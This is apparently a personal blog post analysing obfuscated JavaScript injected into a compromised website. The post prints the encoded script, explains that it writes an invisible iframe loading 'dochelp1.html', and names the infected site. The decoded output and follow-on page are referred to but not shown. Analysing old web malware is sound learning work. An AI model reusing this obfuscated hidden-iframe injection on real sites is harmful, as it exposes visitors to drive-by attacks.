I found this olschool piece of poorly obfuscated code during web surfing. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have first one:
var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp="";
}
document.write(out);Strange string with exclamation marks simply stands for:
So this piece of code simply attaches invisible frame to a current document. I didn’t find dochelp1.html on a server with infected website but after googling a while I found it’s contents:
Website that’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigare further. End of a story.
Infected source: www.galeriadla.art.pl